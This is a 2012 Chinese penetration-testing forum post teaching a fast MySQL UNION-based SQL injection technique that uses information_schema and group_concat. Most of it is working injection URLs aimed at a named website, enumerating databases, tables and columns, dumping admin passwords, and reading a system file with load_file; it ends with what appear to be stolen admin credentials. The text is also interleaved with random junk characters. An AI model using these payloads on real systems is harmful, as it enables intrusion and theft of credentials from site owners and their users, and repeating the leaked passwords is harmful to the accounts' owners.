中国网络渗透测试联盟

标题: mysql注入高效方法 [打印本页]
作者: admin    时间: 2012-9-13 16:37
标题: mysql注入高效方法
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
4 w1 f* h! d( D$ c9 t但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人0 Q, o8 O) ^# R. c+ V

- G' W  |* Y' O
% X8 \. r# {8 e* ?$ f' d8 S优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入) d) r# @- |3 H" |
4 D- \$ p( b2 O1 C
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
/ E- b/ D  d& [" l/ b9 W: i  o3 K8 @. j
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示  V! W; y5 \9 p$ P9 d/ o
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等5 c; m* h& W; _) g; X- `% }" W
% j' L7 G/ y+ L6 |' M& g6 q$ z6 X8 g+ Y
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
. F* p( C) i, q4 X) d$ ^  _& M4 H! a5 p' L0 u% v/ M
读出所有库:' L! h* l5 r+ @; d$ Y
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA9 E' B. \: i1 a

6 S% o6 ]' u+ t# Y6 x/ P3 o  M# @" r' Y0 `
7 g* h  U( B# G
读出所有表:
; s, g; C8 z/ x2 Vhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
3 l" n5 E0 d2 R2 @  @2 w( w* G8 |/ k" U6 |
读出所有表字段:* o" Y7 W- r' z( C# M/ s  \; B
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
; B9 k. a) E; G5 _*/ (97,100,109,105,110)为admin的ascii码 依次类推( U) ^) `5 J* T9 c) B9 K
" M3 N( _: C: D8 e
读出所有表字段里的内容:& N7 I7 _9 Z$ u9 l$ Q$ Q& ]
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin$ t+ K$ a  H$ v* h+ Z

  |  U& e3 t5 x. O0 Q* |" _
4 k5 G" I, e% _5 ^6 n6 ?$ r3 B+ H. N3 T+ S6 D% u
; F  k1 o* j) e  t) B5 A

7 p3 u! p# t3 H* H: ^/ t  x2 C" O0 B* B4 l0 Z
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
/ w8 G1 f0 w. N
- f/ }. O1 l# ?9 N/ h# a" C; ]
# n) h, k! v2 U: @+ T& F+ b  _http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
. ?8 |. t! l5 ^6 E6 U( {% U6 x$ c7 Q  H" V/ l0 P
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23! ?  g$ I7 c. \) [

' B2 D( c9 G# E6 w% l* b6 q5 m
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%232 @- }" ^/ R. q3 k, ^: F
% s/ P! \& h/ }4 ~6 l2 t

( T& n4 `& H: [# P0 m6 S        webmaster:dzb521123,simlab:simadmin20043233
4 V$ e) n# f: z: Z



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2